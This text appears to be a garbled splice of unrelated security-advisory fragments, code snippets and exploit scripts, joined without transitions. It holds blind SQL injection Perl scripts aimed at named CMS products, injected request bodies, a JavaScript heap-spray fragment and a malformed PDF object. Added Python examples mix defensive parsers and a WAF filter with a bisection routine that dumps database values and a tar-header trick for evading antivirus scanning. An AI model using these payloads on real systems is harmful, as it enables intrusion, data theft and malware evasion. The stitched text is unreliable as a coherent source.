Mu Dynamics, Inc. Security Advisories MU-201202-01 and MU-201202-02 for GnuTLS and Libtasn1
TLS record handling vulnerability in GnuTLS [MU-201202-01]
ASN.1 length decoding vulnerability in Libtasn1 [MU-201202-02]
20 March 2012
http://blog.mudynamics.com/2012/03/20/gnutls-and-libtasn1-vulns/
http://labs.mudynamics.com/advisories.html
+/* This is at least as big as the largest possible instructions
+ section: in theory, the instructions could be SVN_DELTA_WINDOW_SIZE
+ 1-byte copy-from-source instructions (though this is very unlikely). */
+#define MAX_INSTRUCTION_SECTION_LEN (SVN_DELTA_WINDOW_SIZE*MAX_INSTRUCTION_LEN)
/* Encode VAL into the buffer P using the variable-length svndiff
integer format. Return the incremented value of P after the
- encoded bytes have been written.
+ encoded bytes have been written. P must point to a buffer of size
+ at least MAX_ENCODED_INT_LEN.
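Review bot: the precondition this comment adds (P must point to a buffer of at least MAX_ENCODED_INT_LEN bytes) is documented but not checked anywhere in the hunk, so a caller that sized its buffer for the old contract fails only by overflowing. Add an assertion on the remaining space or take an end pointer rather than relying on the comment alone. The comment above MAX_INSTRUCTION_SECTION_LEN reasons from SVN_DELTA_WINDOW_SIZE one-byte instructions, while the macro multiplies by MAX_INSTRUCTION_LEN; say explicitly that the bound is deliberately generous so the two do not read as contradicting each other.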
bool ipcomp_encapsulate_data(void *data,
size_t size,
int nxt,
struct ipcomp **out,
size_t *length,
int level)
{
struct ipcomp *ipcomp;
z_stream zstream;
DHCPv6
Message type: Reply (7)
Transaction-ID: 0x007f1ea5
Server Identifier
option type: 2
option length: 10
DUID type: link-layer address (3)
Hardware type: Ethernet (1)
Link-layer address: 50:48:49:4f:4e:53
Client Identifier
option type: 1
Benchmarking attacks and major security weakness on all recent Windows versions up to Windows 2008
----------------------------------------------------------------------------------------------------
+ Author: Fabien KERBOUCI
+ Version/Date: 27/01/2009
+ Keywords: [ benchmark timing benchmarking attacks Windows runas vulnerability password length ]
Get a more detailed version of this advisory, with a complete tutorial and video, in Hakin9 Magazine,
May 2009.
====================================================================================================
-----------------
Python-2.5.2/Modules/zlibmodule.c, lines 761-766:
PyDoc_STRVAR(decomp_flush__doc__,
"flush( [length] ) -- Return a string containing any remaining\n"
"decompressed data. length, if given, is the initial size of the\n"
"output buffer.\n"
"\n"
"The decompressor object can no longer be used after this call.");
ctx->state[1] += B;
ctx->state[2] += C;
ctx->state[3] += D;
}
void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
uint32 left, fill;
if( ! length ) return;
error handlers of the affected application. Exploitation would be
achieved by overwriting pointers in memory with arbitrary values stored
inside the FLAC file, or with hard-coded addresses in DLL files, to direct
code execution toward the attacker's payload.
Vulnerability #3: VORBIS Comment String Size Length Stack Overflow
This is due to predetermined buffer sizes in applications when handling
data in the VORBIS Comment metadata block. By inserting an overly long
VORBIS Comment data string along with a large VORBIS Comment data
string size value (such as 0x000061A8 followed by 25,050 A's),
applications that do not properly apply boundary checks will result in a
addr = net_addr(at);
if( addrcmp( (void *) addr, (void *) &unspec_addr, af ) != 0 ) {
name = dns_lookup(addr); [1]
if(name != NULL) {
/* May be we should test name's length */ [!!]
sprintf(newLine, "%s %d %d %d %d %d %d", name, [2]
net_loss(at),
net_returned(at), net_xmit(at),
net_best(at) /1000, net_avg(at)/1000,
net_worst(at)/1000);
unsigned short afn; /* NHRP AFN */
unsigned short proto; /* NHRP protocol type */
unsigned int snap; /* NHRP SNAP */
unsigned short snapE:8; /* NHRP SNAP */
unsigned short hops:8; /* NHRP hop count */
unsigned short length; /* NHRP total length */
unsigned short checksum; /* NHRP checksum */
unsigned short mpoa_ext; /* NHRP MPOA extensions */
unsigned short version:8; /* NHRP version */
unsigned short type:8; /* NHRP type */
unsigned short nbma_addr:8; /* NHRP t/l of NBMA address */
char *asciivalue; /* formatted double pointer */
int flags; /* formatting options */
int pad_char; /* padding character */
int pad_size; /* pad size */
int width; /* field width */
int left_prec; /* left precision */
int right_prec; /* right precision */
double value; /* just value */
char space_char = ' '; /* space after currency */
print "\t[###] [PATH]: Home Path.\n";
print "\t[###] [DBPREFIX]: Database Prefix. Default: lc_ (**optional)\n";
print "\t[###] [id]: Id user. Default: 1 (**optional)\n";
print "\t[###] Example: perl $0 'www.example.es' 'tematres1.03' 'lc_' '1'\n";
}
sub lengthcolumns{
#First, user length...
$exit=0;
$i=0;
while($exit==0){
my $blindsql=$_[0]."1'+AND+(SELECT+length(".$_[3].")+FROM+".$_[2]."usuario+WHERE+id=".$_[1].")=".$i++."/*"; #injected code
ADD URL: http://dhtmlx.com/docs/products/demoApps/dhtmlxDBAdmin/connection.html?etc=1333992780435
Vulnerable: Input Servername & Username - Listing
ARCserve L&D uses TCP/1900 as its "RPC" interface to manage ARCserve L&D
servers. An example of benign traffic follows:
0000000027rxrLogin~~administrator
---------------------------------------------
Field 1: 10-digit base10 command length field ("0000000027")
Field 2: RPC command ("rxrLogin")
Field 3: Constant Argument Delimiter ("~~")
Field 4: Argument ("administrator")
Vulnerability #1: Authentication Username Overflow
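The framing above is a 10-digit decimal byte count followed by the command, the "~~" delimiter and the arguments, and the username overflow is what happens when a server copies Field 4 into a fixed buffer without comparing its size to that buffer. The parser below is an added example, not ARCserve code or part of the advisory: it reads exactly the declared number of bytes and never past the buffer it holds, rejects a non-numeric or oversized length field, and caps each argument. MAX_FRAME and MAX_ARG are assumptions (the server's real field sizes are not on the page), and the sample frames are built by the frame() helper rather than copied from the advisory, whose count of 27 does not match the 23 visible bytes of "rxrLogin~~administrator".

```python
LEN_DIGITS = 10           # "0000000027"-style decimal byte count, per the advisory
DELIM = b"~~"             # constant argument delimiter, per the advisory
MAX_FRAME = 64 * 1024     # assumption: no legitimate frame is larger than this
MAX_ARG = 256             # assumption: the server's real field sizes are not on the page


class FrameError(ValueError):
    pass


def frame(command, *args):
    """Build a correctly framed message: the length field counts the bytes after it."""
    body = DELIM.join([command.encode("ascii")] + [a.encode("ascii") for a in args])
    return ("%0*d" % (LEN_DIGITS, len(body))).encode("ascii") + body


def parse_frame(buf):
    """Decode the first frame in BUF.

    Returns (command, args, bytes_consumed), or None when the buffer does not yet
    hold the number of bytes the length field promises (the reader waits for more
    data instead of reading past what it has). Raises FrameError for frames that
    can never be valid: a non-numeric length, a length above the cap, or an
    argument longer than the field a server would copy it into.
    """
    if len(buf) < LEN_DIGITS:
        return None
    hdr = buf[:LEN_DIGITS]
    if not hdr.isdigit():
        raise FrameError("length field is not %d ASCII digits: %r" % (LEN_DIGITS, hdr))
    declared = int(hdr)
    if declared > MAX_FRAME:
        raise FrameError("declared length %d exceeds MAX_FRAME" % declared)
    if len(buf) - LEN_DIGITS < declared:
        return None
    body = buf[LEN_DIGITS:LEN_DIGITS + declared]
    fields = body.split(DELIM)
    try:
        command = fields[0].decode("ascii")
        args = [f.decode("ascii") for f in fields[1:]]
    except UnicodeDecodeError as e:
        raise FrameError("non-ASCII byte in frame") from e
    for i, a in enumerate(args):
        if len(a) > MAX_ARG:
            raise FrameError("argument %d of %s is %d bytes, limit %d"
                             % (i, command, len(a), MAX_ARG))
    return command, args, LEN_DIGITS + declared


def parse_stream(buf):
    """Split a byte stream of back-to-back frames; returns (frames, unconsumed_tail)."""
    frames = []
    while True:
        result = parse_frame(buf)
        if result is None:
            return frames, buf
        command, args, used = result
        frames.append((command, args))
        buf = buf[used:]


def is_rejected(buf):
    """True when parse_frame refuses BUF outright (as opposed to waiting for more data)."""
    try:
        parse_frame(buf)
        return False
    except FrameError:
        return True


if __name__ == "__main__":
    login = frame("rxrLogin", "administrator")      # constructed sample frame
    print(login, parse_frame(login))
    print(is_rejected(frame("rxrLogin", "A" * 300)))  # overlong username is refused
```

A frame whose length field promises more bytes than have arrived is the normal case on a stream and gets None, not an error; the error path is reserved for input that could never be valid, which is also the signal a detection rule on TCP/1900 would key on.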
Modifications to the file vmw/src/vmshf.c:
/-----------
static void ReplaceDelim(char *str, uint32_t length, char delim)
{
~ while (length--) {
~ if (*(str + length) == '\0' || *(str + length) == '/' ||
~ *(str + length) == '\\') {
Notes uses a third-party library [2] to process file attachments in the
Lotus Worksheet File format (WKS).
A worksheet file in WKS format is simply a binary representation of the
spreadsheet built using a sequence of binary records in the TLV form
(Type-Length-Value) where both Type and Length are encoded using two bytes.
There are multiple vulnerabilities in the way the Verity KeyView SDK DLL
processes the TLV records of a worksheet file. These vulnerabilities stem
from lack of proper consistency checks for the stated Length and the
corresponding Value in several record Types.
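The consistency check the advisory says is missing is the comparison of each record's stated Length against two things: the bytes actually left in the file, and the size its Type is defined to carry. The walker below is an added example, not the KeyView SDK or any Lotus code: it reads the two-byte Type and two-byte Length described above and refuses a record that fails either comparison, which is the point at which a C implementation copying Length bytes into a fixed-size record structure would overflow. The BOF (type 0, two-byte version) and EOF (type 1, empty) sizes are assumed from the classic Lotus layout; the LABEL type is invented for the example, and all sample files are constructed.

```python
import struct


class WksError(ValueError):
    pass


# Assumed type table for the example: BOF carries a 2-byte version, EOF is empty
# (classic Lotus layout); LABEL is a hypothetical variable-length record.
BOF, EOF, LABEL = 0x0000, 0x0001, 0x000F
EXPECTED_LENGTH = {BOF: 2, EOF: 0}   # types whose Length is fixed by the format


def record(rtype, value=b"", declared_length=None):
    """Build one TLV record; DECLARED_LENGTH lets a test lie about the length."""
    length = len(value) if declared_length is None else declared_length
    return struct.pack("<HH", rtype, length) + value


def parse_wks(data, expected=EXPECTED_LENGTH, max_records=100000):
    """Walk the record stream, refusing any record whose Length disagrees with
    the bytes actually present or with the size its Type requires."""
    records = []
    off = 0
    while off < len(data):
        if len(data) - off < 4:
            raise WksError("truncated record header at offset %d" % off)
        rtype, rlen = struct.unpack_from("<HH", data, off)
        off += 4
        remaining = len(data) - off
        if rlen > remaining:
            raise WksError("type 0x%04x at offset %d declares %d bytes but only %d remain"
                           % (rtype, off - 4, rlen, remaining))
        want = expected.get(rtype)
        if want is not None and rlen != want:
            raise WksError("type 0x%04x declares %d bytes, format requires %d"
                           % (rtype, rlen, want))
        records.append((rtype, data[off:off + rlen]))
        off += rlen
        if rtype == EOF:
            break
        if len(records) > max_records:
            raise WksError("record count exceeds %d" % max_records)
    else:
        raise WksError("stream ended without an EOF record")
    return records


def rejects(data):
    """True when parse_wks refuses DATA."""
    try:
        parse_wks(data)
        return False
    except WksError:
        return True


if __name__ == "__main__":
    good = record(BOF, b"\x04\x04") + record(LABEL, b"hello") + record(EOF)
    print(parse_wks(good))
    print(rejects(record(LABEL, b"hi", declared_length=5000)))   # Length past end of file
    print(rejects(record(BOF, b"\x04\x04\x00\x00") + record(EOF)))  # BOF with wrong size
```

The two failure modes are deliberately kept separate in the error text: a Length past the end of the file is what a fuzzer finds first, while a Length that is legal for the file but wrong for the Type is the one that slips through parsers that only check against the remaining byte count.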
print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com cd54cd7df99a\n"
print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com hidden\n"
print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com bruteforceid\n"
sys.exit()
def brute_length(urlrequest, idadmin, mail):
#Username length
flag=1
i=0
while(flag==1):
i=i+1
The procedure is very simple: sending a plain GET HTTP/1.1 request to
the victim URL several times will make the proxies stop serving it.
Users will wait for about two minutes and then the TCP connection will
be closed, which, depending on the user agent, is interpreted either as
a valid zero-length HTTP 0.9 reply or as an error.
It is worth noting that this attack affects the URL EXACTLY. For
instance, attacking http://www.google.com/ will not block
http://www.google.com./ (notice the dot before the last slash), nor
http://www.google.com/whatever. However, it is clear enough
Function real_get_rdt_chunk() calls rtsp_read_data() to read RDT
(Real Data Transport) chunk headers from the network and then parses them.
An attacker-controlled value from the chunk header is used to allocate a
buffer and is later passed to rtsp_read_data() as the length of RDT chunk
data to read from the network.
An integer underflow can be triggered when parsing a malformed RDT chunk
header; a remote attacker can exploit it to execute arbitrary code in the
context of the application.
ftf4 release before August, but this release has not been confirmed yet
(see the timeline for more details). In the meantime, users can
mitigate these flaws by applying the following countermeasures:
1. For [CVE-2010-1929 | 40480], establish a Web Application
Firewall rule for limiting the length of the parameters
'EnteredClassID' and 'NewClassName' in POST requests to the URI
'/nps/servlet/webacc/'.
2. For [CVE-2010-1930 | 40485], establish a Web Application
Firewall rule for limiting the length of the parameter 'Tree' in POST
requests to the URI '/nps/servlet/webacc/'.
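Both countermeasures are the same rule applied to different parameter names: on a POST to /nps/servlet/webacc/, refuse the request if a named form field exceeds a byte limit. The filter below is an added example of that rule, not a Novell or iManager artefact and not a rule from any particular WAF product. The advisory names the parameters but no limit, so the 64-byte caps are an assumption, and the sample requests are constructed. Lengths are measured after percent-decoding, so an attacker cannot shrink an overlong value by encoding it.

```python
from urllib.parse import parse_qs, urlsplit

PROTECTED_URI = "/nps/servlet/webacc/"
# Per-parameter byte caps: an assumption, the advisory gives names but no numbers.
PARAM_LIMITS = {"EnteredClassID": 64, "NewClassName": 64, "Tree": 64}


def waf_decision(method, target, body, limits=PARAM_LIMITS):
    """Return (allowed, reason) for one request given as (method, request-target, body)."""
    path = urlsplit(target).path
    if method.upper() != "POST" or path != PROTECTED_URI:
        return True, "out of scope"
    # parse_qs percent-decodes, so the size compared is the size the servlet sees
    params = parse_qs(body, keep_blank_values=True)
    for name, cap in limits.items():
        for value in params.get(name, []):
            size = len(value.encode("utf-8"))
            if size > cap:
                return False, "%s is %d bytes, limit is %d" % (name, size, cap)
    return True, "within limits"


def filter_requests(requests):
    """Apply waf_decision to a list of (method, target, body); returns the allow flags."""
    return [waf_decision(*req)[0] for req in requests]


if __name__ == "__main__":
    # Constructed sample traffic (not taken from the advisory)
    samples = [
        ("POST", "/nps/servlet/webacc/", "Tree=corp&NewClassName=box"),
        ("POST", "/nps/servlet/webacc/?x=1", "Tree=" + "A" * 500),
        ("POST", "/nps/servlet/webacc/", "EnteredClassID=" + "%41" * 100),
        ("GET", "/nps/servlet/webacc/", "Tree=" + "A" * 500),
    ]
    for req in samples:
        print(req[0], req[1], waf_decision(*req))
```

The advisory scopes the rule to POST bodies; if the servlet also honours the same parameters in a query string, run the check over urlsplit(target).query as well, otherwise the rule protects one path to the vulnerable code and not the other.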
#Keep-Alive: 300
#Proxy-Connection: keep-alive
#Referer: http://www.onlinegrades.org/demo/parents/parents.php?func=showreportcard
#Cookie: SESS82c464aff4a6373c38ca1d81df10661e=li1lag4844furho010a5ok8uq7; PHPSESSID=2ofepluotebqj7qu009qskaeg7
#Content-Type: application/x-www-form-urlencoded
#Content-length: 72
#TchrUserID=faculty%40onlinegrades.org&sid=4122&schoolid=DEMO&cc=LART101'+AND+1=1# --> TRUE
#TchrUserID=faculty%40onlinegrades.org&sid=4122&schoolid=DEMO&cc=LART101'+AND+1=0# --> FALSE
#
#######################################################################
#######################################################################
attach_info_packet = ('\xfb\x00\x00\x00\x00'
'BINAmdos'
'\xc2\x12\x49\xaf\xbd\x35\xac\x98'
'\x00\x00\x00\x00'
'%(attachment_length)s'
'\x00\x00\x00\x00'
'\xff\xff\xff\xff\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00'
'%(attachment_filename)s'
case FLAC_VORBIS_COMMENT:
{
    /* For a description of the format please have a look at */
    /* http://www.xiph.org/vorbis/doc/v-comment.html */

    uint32_t length, comment_list_len;
(1) char comments[blk_len];
    uint8_t *ptr = comments;
    char *comment;
    int cn;
    char c;
</HEAD>
<BODY>
<script type="text/javascript">
// Fill 0x200000 - 0xa00000 with Breakpoints
var nop = unescape("%u0001%uef9f");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<5;i++)
document.write(nop)
// Fill 0xa00000 - 0x1100000 with address 0x00400040
print "\t[<-->] [PATH]: Home Path.\n";
print "\t[<-->] [Search]: Something. Default: a (**optional)\n";
print "\t[<-->] [id]: Id user. Default: 1 (**optional)\n";
print "\t[<-->] Example: perl $0 'www.example.es' 'leap-CMS' 'a' '1'\n";
}
sub lengthuser{
#First, user length...
$exit=0;
$i=0;
while($exit==0){
my $searchinjected="searchterm=".$_[2]."')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/(SELECT/*y3nh4ck3r*/length(mail)/*y3nh4ck3r*/FROM/*y3nh4ck3r*/users/*y3nh4ck3r*/WHERE/*y3nh4ck3r*/id=".$_[1].")=".$i++."#"; #injected code
<< /BitsPerComponent 8
/ColorSpace /DeviceRGB
/Filter [ /ASCII85Decode
/FlateDecode ]
/Height 2000000000
/Length 61
/Subtype /Image
/Type /XObject
/Width 0 >>
stream
GarPPGWE%h$j7l8U/<b)7aWX$5Y7NE=r1HcE+b-(;)F/"d9oEm?)I\-b23C~>endstream
TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004
CVE no -
CVE-2012-1456
39. If the length field in the header of a file containing the EICAR test
virus, included in a TAR archive, is set greater than the archive's total
length (1,000,000 + original length in our experiments), the antivirus
declares the file clean, but the virus is still extracted correctly by the
GNU tar program.
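Item 39 is a parser differential: the scanner and the extractor disagree about what a tar member whose header size runs past the end of the archive contains. The script below is an added example that reproduces the discrepancy in miniature; it is not the authors' test harness, not the antivirus engine and not GNU tar. It builds a one-member archive, rewrites the header's size field to 1,000,000 plus the original length (fixing the header checksum so the archive is still accepted), and walks it twice: once as a strict scanner that drops a member whose declared extent exceeds the file, once as a tolerant extractor that takes the bytes that are there. The marker string is a constructed stand-in for the EICAR file, and the strict/tolerant behaviours model the outcome described on the page rather than either product's actual code.

```python
import io
import tarfile

# Constructed stand-in for the EICAR test string (assumption, not the real test file)
MARKER = b"CONSTRUCTED-TEST-MARKER-NOT-REAL-MALWARE"
BLOCK = 512
SIZE_OFF, SIZE_LEN = 124, 12     # ustar size field: octal ASCII
CHK_OFF, CHK_LEN = 148, 8        # ustar checksum field


def build_tar(name, data):
    """Write a one-member archive with Python's tarfile module in GNU layout."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.GNU_FORMAT) as tf:
        info = tarfile.TarInfo(name)
        info.size = len(data)
        tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def header_checksum(hdr):
    """Unsigned sum of the header bytes with the checksum field counted as spaces."""
    return sum(hdr[:CHK_OFF]) + CHK_LEN * ord(" ") + sum(hdr[CHK_OFF + CHK_LEN:])


def octal_field(raw):
    return int(raw.split(b"\0", 1)[0].strip() or b"0", 8)


def tamper_size(archive, new_size):
    """Rewrite the first member's size field and refresh the checksum so tar still accepts it."""
    hdr = bytearray(archive[:BLOCK])
    hdr[SIZE_OFF:SIZE_OFF + SIZE_LEN] = b"%011o\0" % new_size
    hdr[CHK_OFF:CHK_OFF + CHK_LEN] = b"%06o\0 " % header_checksum(bytes(hdr))
    return bytes(hdr) + archive[BLOCK:]


def walk(archive, strict):
    """Yield (name, payload) per member.

    strict=True models a scanner that gives up on a member whose declared size
    runs past the end of the archive (so it never sees the payload);
    strict=False models an extractor that takes whatever bytes are present.
    """
    off = 0
    while off + BLOCK <= len(archive):
        hdr = archive[off:off + BLOCK]
        if hdr == b"\0" * BLOCK:
            return                                    # end-of-archive marker
        if header_checksum(hdr) != octal_field(hdr[CHK_OFF:CHK_OFF + CHK_LEN]):
            raise ValueError("bad header checksum at offset %d" % off)
        name = hdr[:100].split(b"\0", 1)[0].decode("ascii")
        size = octal_field(hdr[SIZE_OFF:SIZE_OFF + SIZE_LEN])
        start, end = off + BLOCK, off + BLOCK + size
        if end > len(archive):
            if strict:
                return
            end = len(archive)
        yield name, archive[start:end]
        off = start + ((size + BLOCK - 1) // BLOCK) * BLOCK


def scanner_flags(archive):
    """Strict walk: does the scanner see the marker?"""
    return any(MARKER in payload for _, payload in walk(archive, strict=True))


def extractor_recovers(archive):
    """Tolerant walk: does the extractor produce the marker?"""
    return any(MARKER in payload for _, payload in walk(archive, strict=False))


if __name__ == "__main__":
    clean = build_tar("eicar.txt", MARKER)
    evaded = tamper_size(clean, 1_000_000 + len(MARKER))
    print("original:  scanner", scanner_flags(clean), "extractor", extractor_recovers(clean))
    print("tampered:  scanner", scanner_flags(evaded), "extractor", extractor_recovers(evaded))
```

The defensive lesson is the usual one for archive scanning: the scanner must either reject an archive it cannot parse exactly as the extractor will, or parse it at least as leniently; silently treating an unparseable member as empty is what turns a malformed header into an evasion.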
print "\t[XxX] [HOST]: Web.\n";
print "\t[XxX] [PATH]: Home Path.\n";
print "\t[XxX] [id]: Id user. Default: 1 (**optional)\n";
print "\t[XxX] Example: perl $0 'www.example.es' 'wysgui_1.2' '1'\n";
}
sub lengthuser{
#First, user length...
$exit=0;
$i=0;
while($exit==0){
my $insec_cookie='admin_pages=about" AND (SELECT length(user) from users WHERE ID='.$_[1].')='.$i++.' /*';
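The three Perl subs above (lengthcolumns, and both lengthuser routines) and the AND 1=1 / AND 1=0 pair in the OnlineGrades request comments all drive the same boolean oracle: an injected condition is appended to a query the application builds by string concatenation, and the page either renders normally (TRUE) or not (FALSE). The scripts then ask length(column)=0, =1, =2 and so on until the oracle says TRUE. The code below is an added example written against a constructed in-memory SQLite database; it is not any of the scripts on the page, and the schema, the page lookup query and the users row are assumptions. It reproduces the linear length probe, then goes beyond the scripts with a bisection that needs about log2(N) probes per value and uses it to recover a whole string one character at a time. The comment terminator is "-- " because that is what SQLite accepts; the Perl scripts use "/*" for the same job against MySQL.

```python
import sqlite3


def make_backend():
    """Constructed stand-in for the CMS database (assumption: not the real schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO pages VALUES (1, 'about');
        CREATE TABLE users(id INTEGER PRIMARY KEY, user TEXT, mail TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin@example.es');
    """)
    return db


def page_exists(db, page_name):
    """The vulnerable server-side query: the parameter is concatenated, not bound."""
    sql = "SELECT id FROM pages WHERE name='%s'" % page_name
    return db.execute(sql).fetchone() is not None


def oracle(db, condition):
    """One boolean probe: the page renders (TRUE) only when the injected condition holds."""
    return page_exists(db, "about' AND (%s) -- " % condition)


def length_linear(db, column, table, uid, max_len=64):
    """The scripts' approach: ask length(...)=0, =1, =2, ... until the page says TRUE."""
    for n in range(max_len + 1):
        if oracle(db, "(SELECT length(%s) FROM %s WHERE id=%d)=%d" % (column, table, uid, n)):
            return n
    return None


def bisect_int(db, subquery, hi=255):
    """Recover the integer value of SUBQUERY with about log2(hi) probes instead of up to hi."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(db, "(%s) > %d" % (subquery, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def dump_value(db, column, table, uid):
    """Generalisation of the scripts: the whole string, one bisection per character."""
    where = "FROM %s WHERE id=%d" % (table, uid)
    n = bisect_int(db, "SELECT length(%s) %s" % (column, where), hi=1024)
    chars = []
    for pos in range(1, n + 1):
        code = bisect_int(db, "SELECT unicode(substr(%s,%d,1)) %s" % (column, pos, where),
                          hi=0x10FFFF)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = make_backend()
    print("TRUE probe:", oracle(db, "1=1"), " FALSE probe:", oracle(db, "1=0"))
    print("length(user) by linear scan:", length_linear(db, "user", "users", 1))
    print("user =", dump_value(db, "user", "users", 1))
    print("mail =", dump_value(db, "mail", "users", 1))
```

The fix on the application side is the usual one: bind the parameter (db.execute("SELECT id FROM pages WHERE name=?", (page_name,))) so the quote in the payload is data, at which point every probe above returns FALSE and the oracle disappears.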